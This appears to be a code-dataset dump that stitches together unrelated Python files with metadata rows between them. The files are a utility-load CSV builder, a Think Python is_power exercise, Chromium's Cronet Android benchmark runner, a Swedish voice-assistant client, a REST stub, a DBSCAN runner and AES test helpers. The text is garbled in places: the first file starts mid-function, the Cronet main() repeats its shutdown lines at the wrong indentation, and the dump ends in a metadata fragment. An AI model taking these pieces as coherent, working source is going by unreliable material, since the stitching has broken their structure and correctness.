            dt_ix = pd.date_range(start=(yest + datetime.timedelta(hours=1)), end=(yest + datetime.timedelta(hours=24)), freq='H')
            entry_df.index = dt_ix
            df = df.append(entry_df)
    elif y == 2006:
      # Select this utility's rows from the combined CSV via its EIA code ->
      # respondent_id mapping, then unpivot hour01..hour24 into hourly rows.
      f = pd.read_csv('%s/%s' % (basepath, path_d[y]))
      if u in unique_u_ids.keys():
        if str.isdigit(unique_u_ids[u]['code']):
          eiacode = int(unique_u_ids[u]['code'])
          if eiacode in eia_to_r.index.values:
            if eia_to_r.loc[eiacode, 'respondent_id'] in f['respondent_id'].unique():
              f = f.loc[f['respondent_id'] == eia_to_r.loc[eiacode, 'respondent_id'], [u'plan_date', u'hour01', u'hour02', u'hour03', u'hour04', u'hour05', u'hour06', u'hour07', u'hour08', u'hour09', u'hour10', u'hour11', u'hour12', u'hour13', u'hour14', u'hour15', u'hour16', u'hour17', u'hour18', u'hour19', u'hour20', u'hour21', u'hour22', u'hour23', u'hour24']]
              f['plan_date'] = f['plan_date'].str.split().apply(lambda x: x[0]).apply(lambda x: datetime.datetime.strptime(x, '%m/%d/%Y'))
              f = f.set_index('plan_date').stack().reset_index().rename(columns={'level_1':'hour', 0:'load'})
              f['hour'] = f['hour'].str.replace('hour','').astype(int)-1
              f['date'] = f.apply(lambda x: datetime.datetime(x['plan_date'].year, x['plan_date'].month, x['plan_date'].day, x['hour']), axis=1)
              f = pd.DataFrame(f.set_index('date')['load'])
              df = pd.concat([df, f], axis=0)
  return df
build_paths()
#### Southern California Edison part of CAISO in 2006-2013: resp id 125
# Write one CSV per utility into ./wecc, named by EIA code when known
# (and numeric), otherwise by the raw file-name stem.
if not os.path.exists('./wecc'):
  os.mkdir('wecc')
for x in unique_u:
  out_df = build_df(x)
  if x in unique_u_ids.keys():
    if str.isdigit(unique_u_ids[x]['code']):
      out_df.to_csv('./wecc/%s.csv' % unique_u_ids[x]['code'])
    else:
      out_df.to_csv('./wecc/%s.csv' % x)
  else:
    out_df.to_csv('./wecc/%s.csv' % x)
#################################
from itertools import chain
# Inventory check: collect every output CSV name from the per-region
# subdirectories of the current directory, extract the numeric EIA codes,
# and display the respondent IDs that have no corresponding output file.
li = []
for fn in os.listdir('.'):
    li.append(os.listdir('./%s' % (fn)))
s = pd.Series(list(chain(*li)))
s = s.str.replace('\.csv', '')
u = s[s.str.contains('\d+')].str.replace('[^\d]', '').astype(int).unique()
homedir = os.path.expanduser('~')
rid = pd.read_csv('%s/github/RIPS_kircheis/data/eia_form_714/active/form714-database/form714-database/Respondent IDs.csv' % homedir)
ridu = rid[rid['eia_code'] != 0]
# NOTE(review): this expression's value is displayed only in an interactive
# session; as a script it is computed and discarded.
ridu[~ridu['eia_code'].isin(u)]
| 6,648 | 0 | 58 |
1b8521730032e7c2ffb0cc02b2601ecc37bd48c9 | 287 | py | Python | Chapter06/ex6_4.py | MJC-code/thinkpython | c92702b64a174e85294b17d8bed870977007842b | [
"Unlicense"
] | null | null | null | Chapter06/ex6_4.py | MJC-code/thinkpython | c92702b64a174e85294b17d8bed870977007842b | [
"Unlicense"
] | null | null | null | Chapter06/ex6_4.py | MJC-code/thinkpython | c92702b64a174e85294b17d8bed870977007842b | [
"Unlicense"
] | null | null | null |
# Smoke-test calls for is_power; results are printed, not asserted.
print (is_power(16, 2))
print (is_power(17, 2))
print (is_power(1, 1))
print (is_power(0, 0))
print (is_power(-8 , -2))
print (is_power(-27, -3))
def is_power(a, b):
    """Return True if a is a power of b, i.e. a == b**k for some k >= 1.

    Recursive definition: a is a power of b when a == b, or when a is
    divisible by b and a/b is a power of b.
    """
    if a == b:
        return True
    # Guard degenerate bases.  Without these checks the original recursed
    # forever for b == 1 or b == -1 (a/b never shrinks) and raised
    # ZeroDivisionError for b == 0 with a != 0.
    if b == 0:
        return False  # only a == 0 qualifies, handled above
    if b == 1:
        return False  # only a == 1 qualifies, handled above
    if b == -1:
        return a == 1  # (-1)**2 == 1; a == -1 itself is handled above
    if a % b != 0:
        return False
    # Floor division matches the original Python 2 integer `/` semantics
    # and keeps the result an int on Python 3.
    return is_power(a // b, b)
# Smoke-test calls for is_power; results are printed, not asserted.
print (is_power(16, 2))
print (is_power(17, 2))
print (is_power(1, 1))
print (is_power(0, 0))
print (is_power(-8 , -2))
print (is_power(-27, -3))
| 117 | 0 | 22 |
d973fd1fe77b39f7ee1f99bab397580e0c606b2c | 8,433 | py | Python | components/cronet/android/test/javaperftests/run.py | zealoussnow/chromium | fd8a8914ca0183f0add65ae55f04e287543c7d4a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 76 | 2020-09-02T03:05:41.000Z | 2022-03-30T04:40:55.000Z | components/cronet/android/test/javaperftests/run.py | zealoussnow/chromium | fd8a8914ca0183f0add65ae55f04e287543c7d4a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 45 | 2020-09-02T03:21:37.000Z | 2022-03-31T22:19:45.000Z | components/cronet/android/test/javaperftests/run.py | zealoussnow/chromium | fd8a8914ca0183f0add65ae55f04e287543c7d4a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 8 | 2020-07-22T18:49:18.000Z | 2022-02-08T10:27:16.000Z | #!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This script runs an automated Cronet performance benchmark.
This script:
1. Sets up "USB reverse tethering" which allow network traffic to flow from
an Android device connected to the host machine via a USB cable.
2. Starts HTTP and QUIC servers on the host machine.
3. Installs an Android app on the attached Android device and runs it.
4. Collects the results from the app.
Prerequisites:
1. A rooted (i.e. "adb root" succeeds) Android device connected via a USB cable
to the host machine (i.e. the computer running this script).
2. quic_server has been built for the host machine, e.g. via:
gn gen out/Release --args="is_debug=false"
ninja -C out/Release quic_server
3. cronet_perf_test_apk has been built for the Android device, e.g. via:
./components/cronet/tools/cr_cronet.py gn -r
ninja -C out/Release cronet_perf_test_apk
4. If "sudo ufw status" doesn't say "Status: inactive", run "sudo ufw disable".
5. sudo apt-get install lighttpd
6. If the usb0 interface on the host keeps losing it's IPv4 address
(WaitFor(HasHostAddress) will keep failing), NetworkManager may need to be
told to leave usb0 alone with these commands:
sudo bash -c "printf \"\\n[keyfile]\
\\nunmanaged-devices=interface-name:usb0\\n\" \
>> /etc/NetworkManager/NetworkManager.conf"
sudo service network-manager restart
Invocation:
./run.py
Output:
Benchmark timings are output by telemetry to stdout and written to
./results.html
"""
import json
import optparse
import os
import shutil
import sys
import tempfile
import time
import urllib
REPOSITORY_ROOT = os.path.abspath(os.path.join(
os.path.dirname(__file__), '..', '..', '..', '..', '..'))
sys.path.append(os.path.join(REPOSITORY_ROOT, 'tools', 'perf'))
sys.path.append(os.path.join(REPOSITORY_ROOT, 'build', 'android'))
sys.path.append(os.path.join(REPOSITORY_ROOT, 'components'))
# pylint: disable=wrong-import-position
from chrome_telemetry_build import chromium_config
from devil.android import device_utils
from devil.android.sdk import intent
from core import benchmark_runner
from cronet.tools import android_rndis_forwarder
from cronet.tools import perf_test_utils
import lighttpd_server
from pylib import constants
from telemetry import android
from telemetry import benchmark
from telemetry import story
from telemetry.web_perf import timeline_based_measurement
# pylint: enable=wrong-import-position
# Android AppStory implementation wrapping CronetPerfTest app.
# Launches Cronet perf test app and waits for execution to complete
# by waiting for presence of DONE_FILE.
# For now AndroidStory's SharedAppState works only with
# TimelineBasedMeasurements, so implement one that just forwards results from
# Cronet perf test app.
if __name__ == '__main__':
main()
| 37.986486 | 80 | 0.748725 | #!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This script runs an automated Cronet performance benchmark.
This script:
1. Sets up "USB reverse tethering" which allow network traffic to flow from
an Android device connected to the host machine via a USB cable.
2. Starts HTTP and QUIC servers on the host machine.
3. Installs an Android app on the attached Android device and runs it.
4. Collects the results from the app.
Prerequisites:
1. A rooted (i.e. "adb root" succeeds) Android device connected via a USB cable
to the host machine (i.e. the computer running this script).
2. quic_server has been built for the host machine, e.g. via:
gn gen out/Release --args="is_debug=false"
ninja -C out/Release quic_server
3. cronet_perf_test_apk has been built for the Android device, e.g. via:
./components/cronet/tools/cr_cronet.py gn -r
ninja -C out/Release cronet_perf_test_apk
4. If "sudo ufw status" doesn't say "Status: inactive", run "sudo ufw disable".
5. sudo apt-get install lighttpd
6. If the usb0 interface on the host keeps losing it's IPv4 address
(WaitFor(HasHostAddress) will keep failing), NetworkManager may need to be
told to leave usb0 alone with these commands:
sudo bash -c "printf \"\\n[keyfile]\
\\nunmanaged-devices=interface-name:usb0\\n\" \
>> /etc/NetworkManager/NetworkManager.conf"
sudo service network-manager restart
Invocation:
./run.py
Output:
Benchmark timings are output by telemetry to stdout and written to
./results.html
"""
import json
import optparse
import os
import shutil
import sys
import tempfile
import time
import urllib
REPOSITORY_ROOT = os.path.abspath(os.path.join(
os.path.dirname(__file__), '..', '..', '..', '..', '..'))
sys.path.append(os.path.join(REPOSITORY_ROOT, 'tools', 'perf'))
sys.path.append(os.path.join(REPOSITORY_ROOT, 'build', 'android'))
sys.path.append(os.path.join(REPOSITORY_ROOT, 'components'))
# pylint: disable=wrong-import-position
from chrome_telemetry_build import chromium_config
from devil.android import device_utils
from devil.android.sdk import intent
from core import benchmark_runner
from cronet.tools import android_rndis_forwarder
from cronet.tools import perf_test_utils
import lighttpd_server
from pylib import constants
from telemetry import android
from telemetry import benchmark
from telemetry import story
from telemetry.web_perf import timeline_based_measurement
# pylint: enable=wrong-import-position
def GetDevice():
  """Return the single attached healthy Android device.

  Asserts that exactly one device is connected; multiple or zero devices
  make the benchmark results ambiguous.
  """
  devices = device_utils.DeviceUtils.HealthyDevices()
  assert len(devices) == 1
  return devices[0]
class CronetPerfTestAndroidStory(android.AndroidStory):
  """AndroidStory that launches the Cronet perf test app and awaits DONE_FILE."""
  # Android AppStory implementation wrapping CronetPerfTest app.
  # Launches Cronet perf test app and waits for execution to complete
  # by waiting for presence of DONE_FILE.
  def __init__(self, device):
    self._device = device
    config = perf_test_utils.GetConfig(device)
    # Remove any stale completion marker so Run() doesn't return early.
    device.RemovePath(config['DONE_FILE'], force=True)
    self.url ='http://dummy/?'+urllib.urlencode(config)
    start_intent = intent.Intent(
        package=perf_test_utils.APP_PACKAGE,
        activity=perf_test_utils.APP_ACTIVITY,
        action=perf_test_utils.APP_ACTION,
        # |config| maps from configuration value names to the configured values.
        # |config| is encoded as URL parameter names and values and passed to
        # the Cronet perf test app via the Intent data field.
        data=self.url,
        extras=None,
        category=None)
    super(CronetPerfTestAndroidStory, self).__init__(
        start_intent, name='CronetPerfTest',
        # No reason to wait for app; Run() will wait for results. By default
        # StartActivity will timeout waiting for CronetPerfTest, so override
        # |is_app_ready_predicate| to not wait.
        is_app_ready_predicate=lambda app: True)
  def Run(self, shared_user_story_state):
    """Poll once per second until the app writes its DONE_FILE marker."""
    while not self._device.FileExists(
        perf_test_utils.GetConfig(self._device)['DONE_FILE']):
      time.sleep(1.0)
class CronetPerfTestStorySet(story.StorySet):
  """StorySet containing the single Cronet perf test story."""
  def __init__(self, device):
    super(CronetPerfTestStorySet, self).__init__()
    # Create and add Cronet perf test AndroidStory.
    self.AddStory(CronetPerfTestAndroidStory(device))
class CronetPerfTestMeasurement(
    timeline_based_measurement.TimelineBasedMeasurement):
  """Measurement that forwards the app's JSON results into telemetry results."""
  # For now AndroidStory's SharedAppState works only with
  # TimelineBasedMeasurements, so implement one that just forwards results from
  # Cronet perf test app.
  def __init__(self, device, options):
    super(CronetPerfTestMeasurement, self).__init__(options)
    self._device = device
  def WillRunStory(self, platform, story=None):
    # Skip parent implementation which doesn't apply to Cronet perf test app as
    # it is not a browser with a timeline interface.
    pass
  def Measure(self, platform, results):
    # Reads results from |RESULTS_FILE| on target and adds to |results|.
    # The file is a JSON object mapping test name -> timing in milliseconds.
    jsonResults = json.loads(self._device.ReadFile(
        perf_test_utils.GetConfig(self._device)['RESULTS_FILE']))
    for test in jsonResults:
      results.AddMeasurement(test, 'ms', jsonResults[test])
  def DidRunStory(self, platform, results):
    # Skip parent implementation which calls into tracing_controller which this
    # doesn't have.
    pass
class CronetPerfTestBenchmark(benchmark.Benchmark):
  """Benchmark wiring the Cronet measurement and story set together."""
  # Benchmark implementation spawning off Cronet perf test measurement and
  # StorySet.
  SUPPORTED_PLATFORMS = [story.expectations.ALL_ANDROID]
  def __init__(self, max_failures=None):
    super(CronetPerfTestBenchmark, self).__init__(max_failures)
    self._device = GetDevice()
  def CreatePageTest(self, options):
    return CronetPerfTestMeasurement(self._device, options)
  def CreateStorySet(self, options):
    return CronetPerfTestStorySet(self._device)
def main():
  """Set up the device, host servers and then run the benchmark via telemetry.

  Steps: parse output options, install the perf test APK, start USB reverse
  tethering, start host HTTP (lighttpd) and QUIC servers, invoke telemetry's
  benchmark_runner on CronetPerfTestBenchmark, then shut everything down.
  """
  parser = optparse.OptionParser()
  parser.add_option('--output-format', default='html',
                    help='The output format of the results file.')
  parser.add_option('--output-dir', default=None,
                    help='The directory for the output file. Default value is '
                    'the base directory of this script.')
  options, _ = parser.parse_args()
  constants.SetBuildType(perf_test_utils.BUILD_TYPE)
  # Install APK
  device = GetDevice()
  device.EnableRoot()
  device.Install(perf_test_utils.APP_APK)
  # Start USB reverse tethering.
  android_rndis_forwarder.AndroidRndisForwarder(device,
      perf_test_utils.GetAndroidRndisConfig(device))
  # Start HTTP server.
  http_server_doc_root = perf_test_utils.GenerateHttpTestResources()
  config_file = tempfile.NamedTemporaryFile()
  http_server = lighttpd_server.LighttpdServer(http_server_doc_root,
      port=perf_test_utils.HTTP_PORT,
      base_config_path=config_file.name)
  perf_test_utils.GenerateLighttpdConfig(config_file, http_server_doc_root,
                                         http_server)
  assert http_server.StartupHttpServer()
  config_file.close()
  # Start QUIC server.
  quic_server_doc_root = perf_test_utils.GenerateQuicTestResources(device)
  quic_server = perf_test_utils.QuicServer(quic_server_doc_root)
  quic_server.StartupQuicServer(device)
  # Launch Telemetry's benchmark_runner on CronetPerfTestBenchmark.
  # By specifying this file's directory as the benchmark directory, it will
  # allow benchmark_runner to in turn open this file up and find the
  # CronetPerfTestBenchmark class to run the benchmark.
  top_level_dir = os.path.dirname(os.path.realpath(__file__))
  expectations_files = [os.path.join(top_level_dir, 'expectations.config')]
  runner_config = chromium_config.ChromiumConfig(
      top_level_dir=top_level_dir,
      benchmark_dirs=[top_level_dir],
      expectations_files=expectations_files)
  sys.argv.insert(1, 'run')
  sys.argv.insert(2, 'run.CronetPerfTestBenchmark')
  sys.argv.insert(3, '--browser=android-system-chrome')
  sys.argv.insert(4, '--output-format=' + options.output_format)
  if options.output_dir:
    sys.argv.insert(5, '--output-dir=' + options.output_dir)
  benchmark_runner.main(runner_config)
  # Shutdown.
  quic_server.ShutdownQuicServer()
  shutil.rmtree(quic_server_doc_root)
  http_server.ShutdownHttpServer()
  shutil.rmtree(http_server_doc_root)
shutil.rmtree(quic_server_doc_root)
http_server.ShutdownHttpServer()
shutil.rmtree(http_server_doc_root)
if __name__ == '__main__':
main()
| 4,751 | 378 | 313 |
2ead7fcbf16c57d47c0cdfebf8d054f705e2f8be | 1,923 | py | Python | client_barvis/main.py | antonstagge/BarvisRepo | 3cc780c09839855a6b1704d0975cf6d4af1beb1a | [
"MIT"
] | null | null | null | client_barvis/main.py | antonstagge/BarvisRepo | 3cc780c09839855a6b1704d0975cf6d4af1beb1a | [
"MIT"
] | null | null | null | client_barvis/main.py | antonstagge/BarvisRepo | 3cc780c09839855a6b1704d0975cf6d4af1beb1a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import requests
import os
from threading import Thread
import website
import ai_request
import speech_recognition
import json
recognizer = speech_recognition.Recognizer()
with speech_recognition.Microphone() as source1:
recognizer.adjust_for_ambient_noise(source1)
websiteThread = Thread(target=startWebsite)
websiteThread.start()
waitForBarvis()
#websiteThread.join()
| 26.708333 | 75 | 0.627665 | # -*- coding: utf-8 -*-
import requests
import os
from threading import Thread
import website
import ai_request
import speech_recognition
import json
# One-time microphone calibration: sample ambient noise so the recognizer's
# energy threshold matches the room before any listening starts.
recognizer = speech_recognition.Recognizer()
with speech_recognition.Microphone() as source1:
    recognizer.adjust_for_ambient_noise(source1)
def startWebsite():
    # Thread target: run the (blocking) web UI from the website module.
    website.run()
def speak(text):
    """Speak `text` aloud using the system's "say" command (macOS TTS).

    Uses subprocess with an argument list instead of the original
    os.system("say " + text): string concatenation into a shell command
    allowed arbitrary shell injection through the spoken text (which can
    come from a remote AI response).
    """
    import subprocess
    subprocess.call(["say", str(text)])
def listen(timeout):
    """Record one phrase from the microphone and return its transcript.

    Re-calibrates for ambient noise, waits up to `timeout` seconds for a
    phrase to start, then transcribes it with Google's recognizer using
    Swedish (sv-SE).  Returns "" on timeout or any recognition failure.
    """
    with speech_recognition.Microphone() as source:
        recognizer.adjust_for_ambient_noise(source, 0.5)
        print "listening"
        try:
            audio = recognizer.listen(source, timeout=timeout)
        except speech_recognition.WaitTimeoutError as e:
            audio = None
        print "done listening"
    if audio is not None:
        try:
            # return recognizer.recognize_sphinx(audio)
            return recognizer.recognize_google(audio, language="sv-SE")
        except speech_recognition.UnknownValueError:
            print("Could not understand audio")
        except speech_recognition.RequestError as e:
            print("Recog Error; {0}".format(e))
    return ""
def waitForBarvis():
    """Main loop: wait for the wake word, then handle one spoken command.

    Listens in 1-second slices for the wake word, prompts the user (in
    Swedish), sends the follow-up command to the AI service and acts on
    the returned action.  Runs forever.
    """
    while True:
        prompt = listen(1)
        print prompt
        # Accept common misrecognitions of the wake word "Barvis".
        if "Barbies" in prompt or "Paris" in prompt or "Buddies" in prompt:
            speak("Vad kan jag hjälpa dig med?")
            command = listen(5)
            if command == "":
                continue
            print command
            response = ai_request.aiQurey(command)
            print response
            jsonRespone = json.loads(response)
            action = jsonRespone["result"]["action"]
            print action
            if action == "fromTo":
                speak("From To action")
            else:
                speak("Jag kan inte hjälpa dig med det.")
# Serve the web UI on a background thread, then block forever in the
# wake-word loop on the main thread.
websiteThread = Thread(target=startWebsite)
websiteThread.start()
waitForBarvis()
#websiteThread.join()
| 1,426 | 0 | 92 |
5f5344be6f31c8367be35c2e6cd57644f235871b | 626 | py | Python | cloudframe/resource/v1/res01.py | cloudken/faasframe-py | 50c8cffac3fb20a096c1906b4828b5ec9aee3ba9 | [
"Apache-2.0"
] | null | null | null | cloudframe/resource/v1/res01.py | cloudken/faasframe-py | 50c8cffac3fb20a096c1906b4828b5ec9aee3ba9 | [
"Apache-2.0"
] | null | null | null | cloudframe/resource/v1/res01.py | cloudken/faasframe-py | 50c8cffac3fb20a096c1906b4828b5ec9aee3ba9 | [
"Apache-2.0"
] | null | null | null |
from six.moves import http_client
from cloudframe.common import job
import logging
import time
LOG = logging.getLogger(__name__)
| 17.885714 | 44 | 0.670927 |
from six.moves import http_client
from cloudframe.common import job
import logging
import time
LOG = logging.getLogger(__name__)
def post(tenant, req):
    """Create a server resource for `tenant` asynchronously.

    Dispatches _create_server via job.rpc_cast (fire-and-forget) and
    returns 200 OK immediately without waiting for completion.
    """
    ack = {'status': 'OK'}
    job.rpc_cast(_create_server, server=req)
    return http_client.OK, ack
def put(tenant, res_id, req):
    """Acknowledge an update of resource `res_id` for `tenant` (stub)."""
    return http_client.OK, {'status': 'OK'}
def get(tenant, res_id=None):
    """Acknowledge a read of one resource, or all when `res_id` is None (stub)."""
    return http_client.OK, {'status': 'OK'}
def delete(tenant, res_id):
    """Acknowledge deletion of resource `res_id` for `tenant` (stub)."""
    return http_client.OK, {'status': 'OK'}
def _create_server(server):
    # Background worker invoked via job.rpc_cast: simulates server-creation
    # latency, then logs success.  `server` is the request payload (unused).
    time.sleep(5)
    LOG.debug('create server success!')
    return
| 375 | 0 | 115 |
18cc7423efdb3b5478240fcfb75681630b42f92b | 1,237 | py | Python | mlperf/clustering/dbscan/run_base.py | xinyin1990/ml-perf | a5367b41dffe188b3e86fa3e2fcf975bfcd1afb2 | [
"MIT"
] | null | null | null | mlperf/clustering/dbscan/run_base.py | xinyin1990/ml-perf | a5367b41dffe188b3e86fa3e2fcf975bfcd1afb2 | [
"MIT"
] | null | null | null | mlperf/clustering/dbscan/run_base.py | xinyin1990/ml-perf | a5367b41dffe188b3e86fa3e2fcf975bfcd1afb2 | [
"MIT"
] | null | null | null | import csv
import os
import re
import subprocess
from mlperf.clustering.tools import dumpDataOnCleanCsv
from mlperf.tools.config import MATLAB_EXE, TEMPFOLDER, JAVA_EXE, R_BIN
from mlperf.tools.static import datasetOutFile, MATLAB_ALGO, matlabRedirectTempFolder, WEKA_ALGO, JAVA_CLASSPATH, \
SKLEARN_ALGO, R_ALGO, SHOGUN_ALGO
| 33.432432 | 115 | 0.719483 | import csv
import os
import re
import subprocess
from mlperf.clustering.tools import dumpDataOnCleanCsv
from mlperf.tools.config import MATLAB_EXE, TEMPFOLDER, JAVA_EXE, R_BIN
from mlperf.tools.static import datasetOutFile, MATLAB_ALGO, matlabRedirectTempFolder, WEKA_ALGO, JAVA_CLASSPATH, \
SKLEARN_ALGO, R_ALGO, SHOGUN_ALGO
def sklearnProcess(clustersNumber, dataLessTarget, datasetName, runinfo = None):
    """Run scikit-learn DBSCAN on `dataLessTarget` and dump labels to CSV.

    `clustersNumber` is accepted for interface parity with the other
    backends but unused: DBSCAN derives its clusters from eps/min_samples,
    which are themselves derived from the run number embedded in `runinfo`.
    Skips the run entirely if the output file already exists.

    NOTE(review): runinfo=None would make re.fullmatch raise TypeError; the
    default appears unusable in practice -- confirm callers always pass it.
    """
    import sklearn.cluster
    selectedAlgo = SKLEARN_ALGO
    outputFile = datasetOutFile(datasetName, selectedAlgo, runinfo=runinfo)
    if os.path.exists(outputFile):
        print("sklearn skipped")
        return
    #print(clustersNumber, dataLessTarget, datasetName, runinfo)
    # Extract the trailing run number from runinfo, e.g. "run12" -> 12.
    i = re.fullmatch("[^0-9]*?([0-9]+)", runinfo)
    i = int(i.group(1))
    # Sweep DBSCAN parameters by run number: eps grows linearly, min_samples
    # cycles through 1..10.
    eps_value = 0.33 * i
    sample_value = i%10
    if sample_value == 0:
        sample_value = 10
    builtModel = sklearn.cluster.DBSCAN(eps = eps_value, min_samples = sample_value)
    builtModel.fit(dataLessTarget)
    # NOTE(review): labels_ is positional while `index` is the DataFrame
    # index -- this assumes a default RangeIndex 0..n-1; verify callers.
    with open(outputFile, 'w') as csvfile:
        filewriter = csv.writer(csvfile, quoting=csv.QUOTE_MINIMAL)
        for index, row in dataLessTarget.iterrows():
            filewriter.writerow([index, builtModel.labels_[index]])
| 883 | 0 | 23 |
19bcc48ee9fb238f298a5fac6d357b057a29c779 | 4,499 | py | Python | test/unit/test_02_utils.py | au9ustine/cuda_aes | 873e6768f34de1ea07fc71fc33475c9cd09843ea | [
"BSD-3-Clause"
] | 2 | 2015-06-13T01:44:31.000Z | 2016-05-16T03:09:21.000Z | test/unit/test_02_utils.py | au9ustine/cuda_aes | 873e6768f34de1ea07fc71fc33475c9cd09843ea | [
"BSD-3-Clause"
] | 7 | 2015-06-13T02:55:34.000Z | 2015-07-16T16:29:21.000Z | test/unit/test_02_utils.py | au9ustine/cuda_aes | 873e6768f34de1ea07fc71fc33475c9cd09843ea | [
"BSD-3-Clause"
] | null | null | null | import array
import hashlib
import json
import os.path
import ctypes
from ctypes import *
import utils
logger = utils.get_logger('test_02_utils')
my_lib = load_shared_library()
| 95.723404 | 2,813 | 0.766615 | import array
import hashlib
import json
import os.path
import ctypes
from ctypes import *
import utils
logger = utils.get_logger('test_02_utils')
def load_shared_library():
    """Load the cuda_aes_for_py.so shared library from the src/ directory.

    The path is resolved relative to this test file; an assertion fails
    early with a clear location if the library has not been built.
    """
    my_lib_path = os.path.join(
        os.path.dirname(os.path.abspath(__file__)),
        '..',
        '..',
        'src', 'cuda_aes_for_py.so')
    assert os.path.exists(my_lib_path) is True
    my_lib = CDLL(my_lib_path)
    return my_lib
# Module-level handle shared by all tests below.
my_lib = load_shared_library()
def test_my_str2bytearray():
    """str2bytearray must parse 32 hex chars into the 16 raw bytes 00..0f."""
    dst_len = c_uint32(0x10)
    dst = create_string_buffer(0x10)
    src = '000102030405060708090a0b0c0d0e0f'
    src_len = c_uint32(len(src))
    my_lib.str2bytearray(dst, dst_len, src, src_len)
    assert dst.raw == '\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f'
def test_my_str2uintarray():
    """str2uintarray must expand each hex byte pair into a little-endian uint32."""
    dst_len = c_uint32(0x10)
    # 16 uint32 values -> 64 bytes of buffer.
    dst = create_string_buffer(0x10 * 4)
    src = '000102030405060708090a0b0c0d0e0f'
    src_len = c_uint32(len(src))
    my_lib.str2uintarray(dst, dst_len, src, src_len)
    assert dst.raw == '\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00\x09\x00\x00\x00\x0a\x00\x00\x00\x0b\x00\x00\x00\x0c\x00\x00\x00\x0d\x00\x00\x00\x0e\x00\x00\x00\x0f\x00\x00\x00'
def test_parse_test_data():
    """parse_rsp_str must reproduce the known NIST CBC/GFSbox/128 vectors.

    Both the hard-coded expected structure and the parsed result are
    serialized to canonical JSON (sorted keys) and compared via SHA-1 so a
    mismatch anywhere in the nested structure fails the test.
    """
    test_data = utils.read_rsp_file('CBC', 'GFSbox', 128)
    expected = {'DECRYPT': [{'COUNT': 0, 'PLAINTEXT': 'f34481ec3cc627bacd5dc3fb08f273e6', 'CIPHERTEXT': '0336763e966d92595a567cc9ce537f5e', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}, {'COUNT': 1, 'PLAINTEXT': '9798c4640bad75c7c3227db910174e72', 'CIPHERTEXT': 'a9a1631bf4996954ebc093957b234589', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}, {'COUNT': 2, 'PLAINTEXT': '96ab5c2ff612d9dfaae8c31f30c42168', 'CIPHERTEXT': 'ff4f8391a6a40ca5b25d23bedd44a597', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}, {'COUNT': 3, 'PLAINTEXT': '6a118a874519e64e9963798a503f1d35', 'CIPHERTEXT': 'dc43be40be0e53712f7e2bf5ca707209', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}, {'COUNT': 4, 'PLAINTEXT': 'cb9fceec81286ca3e989bd979b0cb284', 'CIPHERTEXT': '92beedab1895a94faa69b632e5cc47ce', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}, {'COUNT': 5, 'PLAINTEXT': 'b26aeb1874e47ca8358ff22378f09144', 'CIPHERTEXT': '459264f4798f6a78bacb89c15ed3d601', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}, {'COUNT': 6, 'PLAINTEXT': '58c8e00b2631686d54eab84b91f0aca1', 'CIPHERTEXT': '08a4e2efec8a8e3312ca7460b9040bbf', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}], 'ENCRYPT': [{'COUNT': 0, 'PLAINTEXT': 'f34481ec3cc627bacd5dc3fb08f273e6', 'CIPHERTEXT': '0336763e966d92595a567cc9ce537f5e', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}, {'COUNT': 1, 'PLAINTEXT': '9798c4640bad75c7c3227db910174e72', 'CIPHERTEXT': 'a9a1631bf4996954ebc093957b234589', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}, {'COUNT': 2, 'PLAINTEXT': '96ab5c2ff612d9dfaae8c31f30c42168', 'CIPHERTEXT': 'ff4f8391a6a40ca5b25d23bedd44a597', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}, {'COUNT': 3, 'PLAINTEXT': '6a118a874519e64e9963798a503f1d35', 'CIPHERTEXT': 'dc43be40be0e53712f7e2bf5ca707209', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}, {'COUNT': 4, 'PLAINTEXT': 'cb9fceec81286ca3e989bd979b0cb284', 'CIPHERTEXT': '92beedab1895a94faa69b632e5cc47ce', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}, {'COUNT': 5, 'PLAINTEXT': 'b26aeb1874e47ca8358ff22378f09144', 'CIPHERTEXT': '459264f4798f6a78bacb89c15ed3d601', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}, {'COUNT': 6, 'PLAINTEXT': '58c8e00b2631686d54eab84b91f0aca1', 'CIPHERTEXT': '08a4e2efec8a8e3312ca7460b9040bbf', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}]}
    expected_str_val = json.dumps(expected, sort_keys=True)
    expected_hash_val = hashlib.sha1(expected_str_val).hexdigest()
    actual_str_val = json.dumps(utils.parse_rsp_str(test_data), sort_keys=True)
    actual_hash_val = hashlib.sha1(actual_str_val).hexdigest()
    assert expected_hash_val == actual_hash_val
| 4,228 | 0 | 92 |
abe44a7ba7d6b23e2e69483c0c5df6ed944c52b3 | 14,694 | py | Python | plugin/instVHDL.py | B00Ze/instVhdl | e359035dc6a17f82ae109571a8bf07760911b4ef | [
"BSD-3-Clause"
] | 1 | 2021-03-21T16:14:49.000Z | 2021-03-21T16:14:49.000Z | plugin/instVHDL.py | B00Ze/instVhdl | e359035dc6a17f82ae109571a8bf07760911b4ef | [
"BSD-3-Clause"
